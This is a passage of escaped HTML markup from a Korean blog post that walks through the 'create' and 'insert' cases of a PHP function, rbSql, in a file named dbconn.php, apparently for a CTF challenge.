!important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a91629720023-9&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$table&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$fileName&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a91629720023-10&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbWriteFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;SCHEMA&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a91629720023-11&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;exec&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;touch {$fileName};chmod 666 {$fileName}&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a91629720023-12&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$content&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$table&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$fileName&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$query&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a91629720023-13&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbWriteFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$fileName&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$content&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a91629720023-14&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;break&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;“create” of rbSql function in dbconn.php&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;create의 경우 SCHEMA 파일을 읽어온 후 3번째 데이터부터 현재 존재하는 서브테이블의 이름과 일치할 경우(멤버 이름 일치) 에러를 발생시킵니다. SCHEMA는 dbconn.php 상단부에 define 함수로 rbSqlSchema의 경로를 정의한 상수입니다. 이 부분을 통과하게 되면 새로운 서브테이블을 만들기 위해 rand 함수를 이용해 rbSql_[random value 16자리]의 파일명으로 서브테이블을 만들 준비를 하며, SCHEMA 파일에 해당 값을 입력합니다. 그리고 해당 파일을 생성 후 권한을 할당하고, index.php에서 전달받은 배열의 값을 서브테이블에 입력합니다.&lt;/p&gt;&lt;div id=&quot;crayon-5c677473e1a95006483986&quot; class=&quot;crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate&quot; data-settings=&quot; minimize scroll-mouseover&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; text-size-adjust: none; width: 750px; padding: 0px; margin: 12px 0px; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace; color: rgb(60, 72, 88); height: auto; overflow: hidden !important; position: relative !important; direction: ltr !important; border: 1px solid rgb(222, 222, 222) !important; background-color: rgb(248, 248, 255) !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-plain-wrap form-group&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; position: relative; background: 0px center; border: 0px; margin: 0px !important; padding: 0px !important; height: auto !important;&quot;&gt;&lt;textarea wrap=&quot;soft&quot; class=&quot;crayon-plain print-no form-control&quot; data-settings=&quot;dblclick&quot; readonly=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; color: rgb(0, 0, 0); font-style: inherit; font-variant: inherit; font-stretch: inherit; margin: 0px 0px 7px; overflow: hidden; max-width: 100%; padding-top: 0px; padding-right: 5px; padding-left: 5px; display: block; width: 748px; height: 0px; background: linear-gradient(rgb(156, 39, 176), rgb(156, 39, 176)) center bottom / 0px 2px no-repeat, linear-gradient(rgb(210, 210, 210), rgb(210, 210, 210)) center calc(100% - 1px) / 100% 1px transparent; border-width: 0px; border-style: initial; border-color: initial; border-radius: 0px; box-shadow: none; transition: background 0s ease-out 0s; float: none; vertical-align: middle; resize: none; position: absolute; opacity: 0; white-space: pre; overflow-wrap: normal; tab-size: 4; z-index: 0; font-size: 12px !important; line-height: 15px !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important;&quot;&gt;&lt;/textarea&gt;&lt;/div&gt;&lt;div class=&quot;crayon-main&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding: 0px; margin: 0px; width: 748px; overflow: hidden; position: relative; z-index: 1;&quot;&gt;&lt;table class=&quot;crayon-table&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-size: 18px; margin-left: 0px; border-collapse: collapse !important; border-spacing: 0px !important; background: none !important; width: auto !important; border: none !important; padding: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-top: 0px !important; table-layout: auto !important;&quot;&gt;&lt;tbody style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;tr class=&quot;crayon-row&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: none !important; padding: 0px !important; vertical-align: top !important; margin: 0px !important;&quot;&gt;&lt;td class=&quot;crayon-nums &quot; data-settings=&quot;show&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important;&quot;&gt;&lt;div class=&quot;crayon-nums-content&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: nowrap; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a95006483986-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;1&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a95006483986-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;2&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a95006483986-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;3&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a95006483986-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;4&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a95006483986-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;5&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a95006483986-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;6&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a95006483986-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;7&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a95006483986-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;8&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;crayon-code&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background: 0px center; width: 729.6px;&quot;&gt;&lt;div class=&quot;crayon-pre&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: pre; overflow: visible; tab-size: 4; background: none !important; border: none !important; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a95006483986-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;case&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;insert&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a95006483986-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span 